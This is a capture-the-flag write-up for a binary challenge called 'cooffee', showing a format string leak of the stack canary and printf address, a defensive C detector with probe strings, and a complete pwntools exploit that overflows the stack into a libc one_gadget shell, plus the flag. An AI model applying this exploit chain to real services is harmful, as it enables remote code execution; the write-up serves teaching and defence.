Description
It’s early morning, and the caffeine hasn’t quite kicked in yet. As you sip your cup of coffee, you notice something odd – a mysterious program named cooffee is running on your system.
Files: chall, libc-2.31.so
Preamble
The challenge is similar to ftp-console, except that the address of printf is leaked (instead of system) and stack canaries are enabled.
Analysing
A format string vulnerability was found that lets us read the stack canary from the stack.
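The root cause is a user-controlled format string. As an added example (not code from the writeup or the challenge binary), here is the hardened echo beside a small scanner that counts printf conversion directives in untrusted input; a non-zero count on text that should be plain is a cheap input check or log-side detection signal for probes like the one used above. The sample inputs are constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* The bug class behind this challenge:
 *     printf(user_input);          // user controls the format string
 * Hardened form: the format is a literal, user data is only an argument. */
int echo_safe(const char *input) {
    return printf("%s\n", input);   /* returns bytes written */
}

/* Count printf conversion directives in untrusted text, ignoring "%%".
 * Plain text ("ls -la") yields 0; a probe such as "%9$p" yields 1. */
int count_format_directives(const char *s) {
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }                  /* literal percent */
        const char *q = p + 1;
        while (isdigit((unsigned char)*q)) q++;
        if (*q == '$') q++;                                  /* positional "%9$" */
        while (*q && strchr("-+ #0", *q)) q++;               /* flags */
        while (isdigit((unsigned char)*q) || *q == '*') q++; /* width */
        if (*q == '.') {                                     /* precision */
            q++;
            while (isdigit((unsigned char)*q) || *q == '*') q++;
        }
        while (*q && strchr("hlLqjzt", *q)) q++;             /* length modifier */
        if (*q && strchr("diouxXeEfFgGaAcspn", *q)) {        /* conversion char */
            n++;
            p = q;                                           /* skip the directive */
        }
    }
    return n;
}

int main(void) {
    /* Constructed samples: a benign command and two format-string probes. */
    const char *samples[] = { "ls -la", "%9$p ", "%p%p%p%n" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int hits = count_format_directives(samples[i]);
        if (hits > 0)
            printf("ALERT: %d format directive(s) in input: ", hits);
        echo_safe(samples[i]);   /* safe regardless of what the input contains */
    }
    return 0;
}
```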
Resolution
```python
from pwn import *

# Assumed setup (the writeup's template is not shown): the challenge binary,
# the provided libc, and a start() helper that launches a local process.
elf = context.binary = ELF("./chall")
libc = ELF("./libc-2.31.so")

def start():
    return process(elf.path)

io = start()
# "%9$p" prints the 9th stack slot, which holds the canary; the program's own
# output also contains the leaked printf address, taken as the last token.
io.sendlineafter(b"$ ", b"%9$p ")
r = io.recvline()
A = r.decode().strip().split(" ")
canary = int(A[0], 16)
leak = int(A[-1], 16)
libc.address = leak - libc.sym.printf
print(f"canary: {canary:#x}")
print(f"libc base: {libc.address:#x}")
one_gadget = libc.address + 0xe3b01
print(f"one_gadget: {one_gadget:#x}")
# 24 bytes of padding, the canary restored in its slot, a filler value for the
# saved rbp, then the return address pointing at the one_gadget.
payload = b"A"*24 + p64(canary)*2 + p64(one_gadget)
io.sendafter(b"$ ", payload.ljust(0x50, b"A"))
io.interactive()
```
The flag was: CTF{b5d4efc30c05420acb161eb92e120a902187d9710b297fba36d42528ea4ae09d}